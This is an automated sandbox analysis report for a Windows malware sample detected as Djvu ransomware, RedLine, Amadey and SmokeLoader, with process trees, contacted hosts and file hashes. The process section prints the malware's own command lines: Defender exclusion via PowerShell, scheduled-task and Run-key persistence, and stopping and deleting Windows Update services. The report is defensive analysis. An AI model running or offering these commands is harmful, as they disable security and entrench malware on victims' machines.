Malware Analysis Report

2025-04-14 07:03

Sample ID 230723-vm2khsfg9w
Target f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253
SHA256 f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253
Tags
amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor discovery evasion infostealer ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253

Threat Level: Known bad

The file f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253 was found to be: Known bad.

Malicious Activity Summary

amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor discovery evasion infostealer ransomware spyware stealer trojan

SmokeLoader

Detected Djvu ransomware

Amadey

RedLine

Djvu Ransomware

Detect Fabookie payload

Fabookie

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

Executes dropped EXE

Modifies file permissions

Deletes itself

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-23 17:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-23 17:07

Reported

2023-07-23 17:09

Platform

win10-20230703-en

Max time kernel

37s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2468 set thread context of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\95DF.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3220 wrote to memory of 2468 N/A N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 3220 wrote to memory of 2468 N/A N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 3220 wrote to memory of 2468 N/A N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 3220 wrote to memory of 3968 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3220 wrote to memory of 3968 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3968 wrote to memory of 3212 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3968 wrote to memory of 3212 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3968 wrote to memory of 3212 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3220 wrote to memory of 2336 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3220 wrote to memory of 2336 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2336 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2336 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2336 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 2468 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\FE17.exe C:\Users\Admin\AppData\Local\Temp\FE17.exe
PID 3220 wrote to memory of 368 N/A N/A C:\Users\Admin\AppData\Local\Temp\79F.exe
PID 3220 wrote to memory of 368 N/A N/A C:\Users\Admin\AppData\Local\Temp\79F.exe
PID 3220 wrote to memory of 368 N/A N/A C:\Users\Admin\AppData\Local\Temp\79F.exe
PID 3220 wrote to memory of 5040 N/A N/A C:\Users\Admin\AppData\Local\Temp\B0B.exe
PID 3220 wrote to memory of 5040 N/A N/A C:\Users\Admin\AppData\Local\Temp\B0B.exe
PID 3220 wrote to memory of 5040 N/A N/A C:\Users\Admin\AppData\Local\Temp\B0B.exe
PID 3220 wrote to memory of 3808 N/A N/A C:\Users\Admin\AppData\Local\Temp\12EC.exe
PID 3220 wrote to memory of 3808 N/A N/A C:\Users\Admin\AppData\Local\Temp\12EC.exe
PID 3220 wrote to memory of 3808 N/A N/A C:\Users\Admin\AppData\Local\Temp\12EC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe

"C:\Users\Admin\AppData\Local\Temp\f18c21e36a4120f84568aa83f542385ddcfbc9c7df4ec58fa8a22569dc2f0253.exe"

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C7.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\C7.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\210.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\210.dll

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

C:\Users\Admin\AppData\Local\Temp\79F.exe

C:\Users\Admin\AppData\Local\Temp\79F.exe

C:\Users\Admin\AppData\Local\Temp\B0B.exe

C:\Users\Admin\AppData\Local\Temp\B0B.exe

C:\Users\Admin\AppData\Local\Temp\12EC.exe

C:\Users\Admin\AppData\Local\Temp\12EC.exe

C:\Users\Admin\AppData\Local\Temp\2089.exe

C:\Users\Admin\AppData\Local\Temp\2089.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\fed1e4b1-7e96-4a63-9aa8-04eed357422f" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\FE17.exe

"C:\Users\Admin\AppData\Local\Temp\FE17.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

"C:\Users\Admin\AppData\Local\Temp\FE17.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\5A1D.exe

C:\Users\Admin\AppData\Local\Temp\5A1D.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Users\Admin\AppData\Local\Temp\4C21.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

"C:\Users\Admin\AppData\Local\Temp\3BD4.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build2.exe

"C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build2.exe"

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\9802.dll

C:\Users\Admin\AppData\Local\Temp\4C21.exe

"C:\Users\Admin\AppData\Local\Temp\4C21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe

"C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe"

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

"C:\Users\Admin\AppData\Local\Temp\4A7B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\9802.dll

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\3942.exe

"C:\Users\Admin\AppData\Local\Temp\3942.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\67E6.exe

C:\Users\Admin\AppData\Local\Temp\67E6.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\8E7B.exe

C:\Users\Admin\AppData\Local\Temp\8E7B.exe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

"C:\Users\Admin\AppData\Local\Temp\3BD4.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

C:\Users\Admin\AppData\Local\Temp\3942.exe

"C:\Users\Admin\AppData\Local\Temp\3942.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4C21.exe

"C:\Users\Admin\AppData\Local\Temp\4C21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

"C:\Users\Admin\AppData\Local\Temp\4A7B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\95DF.exe

C:\Users\Admin\AppData\Local\Temp\95DF.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Users\Admin\AppData\Local\Temp\89E6.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 780

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Local\Temp\9561.exe

"C:\Users\Admin\AppData\Local\Temp\9561.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\AD11.exe

C:\Users\Admin\AppData\Local\Temp\AD11.exe

C:\Users\Admin\AppData\Local\Temp\9561.exe

"C:\Users\Admin\AppData\Local\Temp\9561.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\B05E.exe

C:\Users\Admin\AppData\Local\Temp\B05E.exe

C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe

"C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 potunulit.org udp
US 188.114.96.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 251.39.40.211.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 139.175.169.194.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
FR 149.202.8.114:26642 tcp
FR 149.202.8.114:26642 tcp
US 8.8.8.8:53 114.8.202.149.in-addr.arpa udp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 194.169.175.139:3003 194.169.175.139 tcp
KR 211.40.39.251:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 211.40.39.251:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.119.84.111:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
NL 162.0.217.254:443 api.2ip.ua tcp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 111.84.119.211.in-addr.arpa udp
FR 149.202.8.114:26642 tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
KR 211.119.84.111:80 zexeq.com tcp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 greenbi.net udp
KR 175.119.10.231:80 greenbi.net tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 231.10.119.175.in-addr.arpa udp
PS 213.6.54.58:443 nordskills.eu tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
KR 175.119.10.231:80 greenbi.net tcp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.40.39.251:80 colisumy.com tcp
KR 175.119.10.231:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
FR 149.202.8.114:26642 tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.40.39.251:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 175.119.10.231:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 194.169.175.139:3003 194.169.175.139 tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.40.39.251:80 colisumy.com tcp
KR 175.119.10.231:80 greenbi.net tcp
KR 211.119.84.111:80 zexeq.com tcp

Files

memory/5060-121-0x0000000002730000-0x0000000002830000-memory.dmp

memory/5060-122-0x0000000000400000-0x000000000246F000-memory.dmp

memory/5060-123-0x00000000026B0000-0x00000000026B9000-memory.dmp

memory/3220-124-0x0000000001320000-0x0000000001336000-memory.dmp

memory/5060-125-0x0000000000400000-0x000000000246F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/3212-139-0x0000000000BB0000-0x0000000000CE4000-memory.dmp

memory/3212-143-0x0000000000BB0000-0x0000000000CE4000-memory.dmp

memory/2468-144-0x0000000004150000-0x00000000041E4000-memory.dmp

memory/2468-146-0x00000000041F0000-0x000000000430B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\210.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/3212-141-0x0000000000540000-0x0000000000546000-memory.dmp

\Users\Admin\AppData\Local\Temp\C7.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4508-148-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4508-153-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4876-154-0x0000000000B50000-0x0000000000C84000-memory.dmp

\Users\Admin\AppData\Local\Temp\210.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

\Users\Admin\AppData\Local\Temp\210.dll

MD5 f81fc87a82e628512761653d103abfba
